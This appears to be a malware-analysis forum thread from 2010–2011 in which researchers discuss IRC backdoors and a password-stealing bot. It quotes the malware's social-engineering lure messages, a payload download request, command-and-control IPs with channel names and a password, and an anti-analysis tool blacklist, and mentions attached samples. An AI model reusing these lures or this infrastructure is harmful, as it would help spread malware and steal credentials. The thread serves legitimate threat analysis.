A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #4055  by nullptr
 Sat Dec 18, 2010 11:39 am
An IRC backdoor with some interesting strings.
SEINFELD_SUPERMAN
I'm never going to take picture of myself again! They always turn out like this.
Tell me what you think of this picture I edited. Thanks!
This is the funniest photo ever! What do you think?
Tell me what you think of this photo of me?
I just got a new hair cut! Tell me what you think?
I don't think I will ever sleep again after seeing this photo! Take a look.
I cant believe I still have this picture of you from last winter. Do you remember it?
Should I make this my default picture? Or does it look too evil?
My parents are going to kill me, if they find this picture. But does it look bad?
original file + decrypted attached
Attachments
pass : malware
(43.62 KiB) Downloaded 76 times
 #4056  by EP_X0FF
 Sat Dec 18, 2010 11:43 am
Must be spreading messages, targeting contact list :)
I've something of this in my icq antibot logs.
 #4116  by nullptr
 Thu Dec 23, 2010 8:37 am
An IRC bot, password stealer. Runs as %windir%\tanga.exe
// 212.59.0.8:80
GET /k-austo.exe HTTP/1.1 If-Modified-Since: Wed, 22 Dec 2010 20:52:45 GMT If-None-Match: "6a882cb-1a000-49805ef5dc140" User-Agent: Mozilla/4.0 (compatible) Host: hxxp://www.ahava.lt

// 207.210.96.152:6567
JOIN #kausto# c1rc0dus0leil
JOIN #causto# c1rc0dus0leil
Contains a small blacklist: Wireshark, tcpview, filemon, procmon
Original file, decrypted and ****strings attached.
Attachments
pass : malware
(87.6 KiB) Downloaded 53 times
 #7854  by EP_X0FF
 Fri Aug 05, 2011 9:29 am
Momibot/AllNite if someone interested. Mistakenly marked abuse.ch as SpyEye.

In attach both dropper and unpacked.
.168.1.2:6667#AllNiteCafe
Original
http://www.virustotal.com/file-scan/rep ... 1312535222

Unpacked
http://www.virustotal.com/file-scan/rep ... 1312534957
Attachments
pass: malware
(57.25 KiB) Downloaded 44 times
 #8334  by EP_X0FF
 Mon Aug 29, 2011 4:06 pm
markusg wrote:(A) siljedaehaksaengdonggeokeopeulyuchulbon 1.mpg.exe
MD5   : 92abb5a40aa3ecdf9da29345c060efae
http://www.virustotal.com/file-scan/rep ... 1314630930
Protected by Themida.

Under Themida incredible primitive piece of Delphi code.

A Form with TWebBrowser component and TSocketDM. Trash spawned IE window with trash (what a surprise) in caption and then died. Yeah, I think it's sort of skiddie backdoor :)

Image